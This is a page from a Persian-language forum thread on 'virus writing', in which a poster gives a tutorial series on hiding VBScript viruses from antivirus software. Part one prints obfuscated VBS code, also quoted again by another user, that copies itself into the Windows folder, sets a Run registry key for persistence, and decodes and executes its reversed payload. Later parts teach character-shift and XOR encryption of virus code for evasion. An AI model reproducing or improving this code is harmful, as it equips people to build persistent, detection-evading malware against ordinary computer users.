تبلیغات :
آکوستیک ، فوم شانه تخم مرغی، صداگیر ماینر ، یونولیت
دستگاه جوجه کشی حرفه ای
فروش آنلاین لباس کودک
خرید فالوور ایرانی
خرید فالوور اینستاگرام
خرید ممبر تلگرام

[ + افزودن آگهی متنی جدید ]

صفحه 14 از 17 اولاول ... 41011121314151617 آخرآخر
نمايش نتايج 131 به 140 از 169

نام تاپيک: ويروس نويسي و انتي ويروس نويسي

حـــــرفـه ای Maysam-BFU's Avatar
    تاريخ عضويت
    Oct 2006
    محل سكونت
    Failed box !

پيش فرض

چه جالب وقتی که وارد صفحه 13 شدم NOD32 گفت در اون صفحه یک Script ویروسی وجود داره.

ممنون از دوستان استفاده کردیم.

اگه نباشه جاش خالی می مونه CrazyTux's Avatar
    تاريخ عضويت
    May 2007
    محل سكونت
    In P30world!

پيش فرض

توی این تاپیک همه چیز هست به جز ویروس نویسی و انتی ویروس ... فکر کنم بهتره اسم این قسمت را متفرقه بزاریم

Banned
    تاريخ عضويت
    Mar 2007
    محل سكونت
    Forum.p30world

پيش فرض

توی این تاپیک همه چیز هست به جز ویروس نویسی و انتی ویروس ... فکر کنم بهتره اسم این قسمت را متفرقه بزاریم
    شما اگر اون مطالب رو خونده باشی ميفهمی که همش در رابطه با ويروس نويسی هستش. بهتره ديگه نظر ندی

Banned
    تاريخ عضويت
    Mar 2007
    محل سكونت
    Forum.p30world

پيش فرض

چطور ويروسمونو غير قابل شناسايی کنيم؟

سلام بچه ها. قراره از امروز آموزش مخفی سازی ويروس vbs رو از دست AV ها داشته باشيم. اما اول يکم توضيح:
    در واقع زياد شدن و رايج بودن و قدرت بالای تخريب ويروس های vbs باعث شده که AVs (آنتی ويروس ها) در تشخيص اونا يکم زياده روی کنن به طوری که بعضی وقتا به بعضی فايل های vbs عادی هم گير ۳ پيچ می دن . طرز شناسايی اين ويروس ها توسط AVs درست مثل کدهای استفاده شده در خود اونا تابلوست. يعنی چی؟ خوب مثلا اکثر اين ويروس ها از اين فرمان CreateObject("Scripting.FileSystemObject") i در کد خودشون استفاده می کنن. خوب ويروس ياب ها هم از فرصت اشتفاده می کنن و هر فايلی که محتوی اين فرمان و چند فرمان تابلوی ديگه باشه رو به عنوان ويروس شناسايی می کنن (زحمت می کشن). ما هم برای اينکه سر اونا رو گول بماليم چکار می کنيم؟ بله بدترين نظر اينکه بگيم بايد بی خيال اين فرمان های شد و...
    در اين مقاله و يکی دو تای آينده می خوام چند روش برای مخفی سازی vbs ها معرفی کنم که تمامشون توسط افراد می شه گفت حرفه ای (KaGra=Bridga virii group, jackie=LineZer0 group) امتحان شدن و کار می کنن و استفاده از هرکدومشون کد شما رو ۱۰۰٪ غيرقابل شناسايی می کنه!!
    روش اول اينقدر سادس که فکر کنم اگر توضيحات رو تو خود کد بگم کافی باشه فقط بگم اجرای اين کد باعث ميشه تا ويروس خودشو در شاخه ويندوز کپی کنه و با تغيير در رجيستری با هر بار بالا امدن ويندوز اجرا بشه.
    ' Method by KaGara'' In http://viri.persianblog.com''txen emuser rorre no')"tcejbOmetsySeliF.gnitpircS"(tcejbOetaerC = OSF tes')redloFswodniW(redloFlaicepSteG.OSF = riDypoC'"sbv.xco.23glDmoC\" + riDypoC = htaPV')"llehS.tpircSW"(tcejbOetaerC = llehShsW teS'"ZS_GER" ,"% " + htaPV +" exe.tpircsw" ,"23GLDMOC\nuR\noisreVtnerruC\swodniW\tfosorciM\ER AWTFOS\MLKH" etirWgeR.llehShsW'htaPV ,emaNlluFtpircS.tpircSW eliFypoC.OSFon error resume nextSet fso = CreateObject("Scripting.FileSystemObject")Set fil = fso.OpenTextFile(wscript.scriptfullname)for I=1 to 8 buf = Fil.ReadLine 'خط به خط می خونه buf2= StrReverse(buf) 'هر خط رو برعکس می کنه buf3= Mid(buf2, 1, Len(buf2)-1) ' کاراکتر اضافی "'" ته هر خط رو پاک می کنه all = all& ":" & buf3 ' تمام خطوط رو کنار هم می زارهnextfil.Close()pasargad = Mid(all, 2, len(All)-1) 'کاراکتر اول رشته رو پاک می کنهexecute(pasargad) ' رشته داده شده رو اجرا می کنه
    خوب ديديد چقدر سادس!! فقط بايد بگم در vbs اگر بخوايد چندتا فرمان رو تو يه خط بنويسيد بايد اونا رو با کاراکتر ":" از هم جدا کنيد. و همچنين فرمان execute که همه اين روش ها بر مبنای اين تابع بوجود می يان٬ رشته ورودی رو که يکسری فرمان vbs بايد باشه رو اجرا می کنه مثلا Execute(" a=100: b=200: msgbox a+b")i يه مسيج باکس با متن ۳۰۰ نمايش می ده. همچنين بايد بگم تو اين روش شما نبايد در کد خودتون از فرمان execute() استفاده کنيد چون دوتا فرمان execute تو در تو باعث ايجاد خطا می شه. مثلا: execute(execute(buffer))i دستور buffer رو اجرا نخواهد کرد.
    خوب ديگه خيلی طولانی شد! اما دفعه بعد با يه روش ديگه که خيلی جالبتر و علمی تر و ... تر هست در خدمتتون خواهم بود

Banned
    تاريخ عضويت
    Mar 2007
    محل سكونت
    Forum.p30world

پيش فرض

چطور ويروسمونو غير قابل شناسايی کنيم؟ (قسمت ۲)

سلام. تو پست قبلی درباره يکی از روش های مخفی سازی ويروس يا در اصل Virus Code Encryption (از اين به بعد با همين اصتلاح کار می کنيم) توضيح دادم که تقريبا روش خوبی بود. اما بزاريد يه سری روش های ديگه رو هم که معمولا در Encrypt سازی ويروس ها از اونا استفاده می شه معرفی کنيم.
    خوب فکر کنم با ديدن مثال قبلی (تو پست قبل)‌ متوجه شده باشيد که اصل ساختار Encrypting (به رمز درآوردن) به چه صورته. ابتدا کد ويروس رو به روش ها مختلف Encrypt می کنيم بعد کدی می نويسيم که با هر بار اجرای ويروس کد Encrypt شده رو Decrypt (از حالت رمزی خارج کردن) کنه و با استفاده از فرمان Execute اونو اجرا کنه حالا ساير روش های Encrypt سازی.
    ببينيد بيايد در اين مرحله اصلا فکر کنيم که نمی خايم کد vb رو Encrypt کنيم. مثلا فکر کنيد می خاييد نامه ای رو که به دوستتون نوشتيد رمزی کنيد ( ای کلک)٬ خوب حالا چکار می کنيد؟ يه روش اينکه تمام حروف رو يکی ببرين جلو مثلا "honey" تبديل ميشه به "ipofz"٫ درسته بقول معروف روش ازگل هاست ولی حتی استفاده از همين روش هم AV ها رو عاجز می کنه. بزاريد يکم عملی ترش کنيم:
    روش جمع/تفريق:
    اين روش شبيه همون روش بالاست يعنی مثلا حروف يک رشته رو يک يا هرچندتا که بخايم جلو يا عقب ببريم. ديگه فکر کنم اينقدر حرفه ای هستيد که فقط نشون دادن مثال کافی باشه:
    OldString = "This is a test!"
    For i = 1 to Len(OldString)
    NewString = NewString & Chr(Asc(Mid(OldString, i, 1)) + 23)
    Next
    اين کد مقدار اسکی هر حرف از رشته OldString را به اندازه ۲۳ واحد افزايش می دهد و آن را در متغيير NewString قرار می دهد. در پايان حلقه مقدار رشته NewString (مثلا يه چيزی مثل)٬ "ی↔…β−÷ا لت≤ه♀»غ" خواهد شد. مشکل اين روش اين است که روال عمليات Encryption با روال Decryption متفاوت است. يعنی برای از رمز در آوردن رشته جديد بايد از روال زير استفاده کنيم:
    OldString = "ی↔…β−÷ا لت≤ه♀»غ"
    For i = 1 to Len(OldString)
    NewString = NewString & Chr(Asc(Mid(OldString, i, 1)) - 23)
    Next
    اين روال رشته ما رو دوباره به صورت "This is a test!" در خواهد آورد. (ايندفه ۲۳ تا کم می کنه) البته شما می تونيد از مقادير بيشتر يا کمتری برای اضافه يا کم کردن استفاده کنيد اما بخاطر داشته باشيد که مقادير اسکی از ۰ تا ۲۵۵ هستند و اگر مثلا شما مقدار اسکی کاراکتر "A" رو که ۶۵ هست بعلاوه ۲۰۰ يا منهای ۶۷ بکنيد از اين محدوده خارج شديد و باعث ايجاد خطا هنگام اجرای برنامتون می شيد.
    فکر نمی کنم سخت باشه و فقط با يبار دوره ميتونيد اصلا خودتون يه همچين مقاله آموزشی بنويسيد . ايندفه خيلی طولانی شد!! ولی هنوز حرفه ای ترين روش مونده که ايشاالله مقاله بعدی.

Banned
    تاريخ عضويت
    Mar 2007
    محل سكونت
    Forum.p30world

پيش فرض

چطور ويروسمونو غير قابل شناسايی کنيم؟ (قسمت ۳)
    خوب داشتيم رو روش های encrypt سازی کار می کرديم و حالا روش بعدی:
    روش XOR:
    ميشه گفت اين روش رو بسياری از ويروس های نرمال asm هم برای encrypt سازی خودشون استفاده می کردند و تقريبا بهترين و شناخته شده ترين روشه! بايد بگم xor هم يه عملونده درست مثل + يا - و تقريبا تو تمام زبون های برنامه نويسی هم وجود داره. اما قسمت سخت کار درک روش کار اين عملونده! به اين عبارت توجه کنيد:
    5 XOR 3 = 6
    خوب همينه ديگه! اگر هيچ اطلاعاتی در مورد نحوه کار اين عملوند نداشته باشيد عمرا نتونيد متوجه بشيد بين ۳ و ۵ چه رابطه ای هست که بشه ۶!!!! در واقع اين عملوند با معادل های باينری اعداد يا حروف کار می کنه (اگر باينری بلد نيستيد هم خيالی نيست). و همونطوری که بايد/شايد بدونيد باينری ها فقط از ۰ و ۱ تشکيل ميشن. مثلا معادل باينری ۵ = ۰۰۰۰۰۱۰۱ و معادل سه = ۰۰۰۰۰۰۱۱. با اين توضيحات يه نگاه ديگه بندازيد:
    0 0 0 0 0 1 0 1 معادل سه
    0 0 0 0 0 0 1 1 XOR معادل پنج
    ==========
    0 0 0 0 0 1 1 0 معادل شش
    خوب حالا ديگه شايد به رابطش پی برده باشيد!! وقتی که عملوند XOR روی دو باينری تاثير می زاره همونطور که در بالا می بينيد اگر هردو بيت ۰ باشند بيت جواب هم ۰ ميشه. اگر يکی از بيت ها ۱ و ديگری ۰ باشه بيت جواب ۱ خواهد شد ولی اگر هر دو بيت ۱ باشه بيت جواب ۰ خواهد شد (در ضمن اين کار رو بايد با هر ۸ تا بيت انجام بديم)! خوب اگر به شماتيک بالا نگاه کيند می بينيد که طبق توضيح پنچ تا بيت اول (ما از چپ شروع می کنيم) که در هر دو باينری ۰ بوده پنج تا ۰ در باينری جواب بوجود آورده. در بيت ششم و هفتم هم يکی ۰ و يکی ۱ داشته پس جواب در هر دو حالت ۱ ميشه. اما بيت هشتم هر دو باينری ۱ هست پس بيت هشتم باينری جواب ۰ خواهد شده. و حالا ۰۰۰۰۰۱۱۰ مقدار باينری معادل ۶ هستش (بازم می گم لازم نيست شما مقدار باينری معادل هر عدد یا حروفی رو بدونيد!)
    خوب حالا اين چه ربطی داشت؟ (تو قسمتای بعدی می گم )

آخر فروم باز تکنیک برتر's Avatar
    تاريخ عضويت
    Sep 2005

پيش فرض

mazi_z_MCSDسلام دوست عزیز خوبی من تا الان می خواستم خودمو تو این تاپیک دخالت ندم ولی الان می خواهم اینکارو انجام بدم شما کاربر خوبی هستین ولی یخورده انگار اصبی هستی اینجور صحبت کردن درست نیست. ناراحت نشی یا گفتم بدونی من مدیر نیستم ولی وظیفه خودم دونستم اینو به شما گوش زد کنم چون از همین کلمات کوچک یهو این تاپیک ....... به راههای دیگه کشیده می شه و در آخر هم باید جمع بشه
    ممنون
    نقل قول:
    نوشته شده توسط CrazyTux مشاهده تاپيک
    جواب شما mazi_z_MCSD
    شما اگر اون مطالب رو خونده باشی ميفهمی که همش در رابطه با ويروس نويسی هستش. بهتره ديگه نظر ندی

اگه نباشه جاش خالی می مونه Naser_helboy's Avatar
    تاريخ عضويت
    May 2006
    محل سكونت
    تهرون

پيش فرض

روش اول اينقدر سادس که فکر کنم اگر توضيحات رو تو خود کد بگم کافی باشه فقط بگم اجرای اين کد باعث ميشه تا ويروس خودشو در شاخه ويندوز کپی کنه و با تغيير در رجيستری با هر بار بالا امدن ويندوز اجرا بشه.
    ' Method by KaGara'' In http://viri.persianblog.com''txen emuser rorre no')"tcejbOmetsySeliF.gnitpircS"(tcejbOetaerC = OSF tes')redloFswodniW(redloFlaicepSteG.OSF = riDypoC'"sbv.xco.23glDmoC\" + riDypoC = htaPV')"llehS.tpircSW"(tcejbOetaerC = llehShsW teS'"ZS_GER" ,"% " + htaPV +" exe.tpircsw" ,"23GLDMOC\nuR\noisreVtnerruC\swodniW\tfosorciM \ER AWTFOS\MLKH" etirWgeR.llehShsW'htaPV ,emaNlluFtpircS.tpircSW eliFypoC.OSFon error resume nextSet fso = CreateObject("Scripting.FileSystemObject")Set fil = fso.OpenTextFile(wscript.scriptfullname)for I=1 to 8 buf = Fil.ReadLine 'خط به خط می خونه buf2= StrReverse(buf) 'هر خط رو برعکس می کنه buf3= Mid(buf2, 1, Len(buf2)-1) ' کاراکتر اضافی "'" ته هر خط رو پاک می کنه all = all& ":" & buf3 ' تمام خطوط رو کنار هم می زارهnextfil.Close()pasargad = Mid(all, 2, len(All)-1) 'کاراکتر اول رشته رو پاک می کنهexecute(pasargad) ' رشته داده شده رو اجرا می کنه
    خوب ديديد چقدر سادس!! فقط بايد بگم در vbs اگر بخوايد چندتا فرمان رو تو يه خط بنويسيد بايد اونا رو با کاراکتر ":" از هم جدا کنيد. و همچنين فرمان execute که همه اين روش ها بر مبنای اين تابع بوجود می يان٬ رشته ورودی رو که يکسری فرمان vbs بايد باشه رو اجرا می کنه مثلا Execute(" a=100: b=200: msgbox a+b")i يه مسيج باکس با متن ۳۰۰ نمايش می ده. همچنين بايد بگم تو اين روش شما نبايد در کد خودتون از فرمان execute() استفاده کنيد چون دوتا فرمان execute تو در تو باعث ايجاد خطا می شه. مثلا: execute(execute(buffer))i دستور buffer رو اجرا نخواهد کرد.
    خوب ديگه خيلی طولانی شد! اما دفعه بعد با يه روش ديگه که خيلی جالبتر و علمی تر و ... تر هست در خدمتتون خواهم بود
    فکر کنم مطالبت کپی پیست کردی

کاش اغلا خودت تایپ میکردی تا بفهمیم چی نوشتی

Banned
    تاريخ عضويت
    Mar 2007
    محل سكونت
    Forum.p30world

پيش فرض

فکر کنم مطالبت کپی پیست کردی

کاش اغلا خودت تایپ میکردی تا بفهمیم چی نوشتی
    الان هم اگه کمی به خودت زحمت بدی و مطالب رو تو Word کپی کنی و با فونت و سايزی که ميخوای تنظيم کنی بهتر ميتونی بخونی. این حرف رو قبلا هم برايه کمک به دوستان گفته بودم
    البته خوشحال ميشم از انتقادادتون ميتونم با نظرات شما تاپيک رو بهتر کنم منتظر مقالات بعدی باشيد

در آغاز فعالیت Spy sky's Avatar
    تاريخ عضويت
    Mar 2007
    محل سكونت
    posht PC

9 نه بابا

با تشکر از همه ی ویروس نویس های عزیز . مقاله ها بسیار به دردم خورد.

یک پیشنهادی برای همه ی افرادی دارم که می خواهند کامپیوترشان از اینترنت آلوده نشود. به نظر من با سیستم عامل لینوکس به اینترنت وصل شوید چون از امنیت بسیار بسیار بسیار بالایی برخوردار است.

در ضمن می خواستم ببینم اینجا کسی هست که بتواند برای این سیستم عامل ویروس بنویسد ؟

با عرض سلام من می خواستم بگم که لینوکس و نرم افزار های اون و روش کارش اسون نیست که هر کسی بتونه کار کنه بعد هم این نرم افزار های که لینوکس خودش داره جامع نیست

Thread Information

Users Browsing this Thread

هم اکنون 1 کاربر در حال مشاهده این تاپیک میباشد. (0 کاربر عضو شده و 1 مهمان)

User Tag List

قوانين ايجاد تاپيک در انجمن

• شما نمی توانید تاپیک ایحاد کنید
  • شما نمی توانید پاسخی ارسال کنید
  • شما نمی توانید فایل پیوست کنید
  • شما نمی توانید پاسخ خود را ویرایش کنید
  •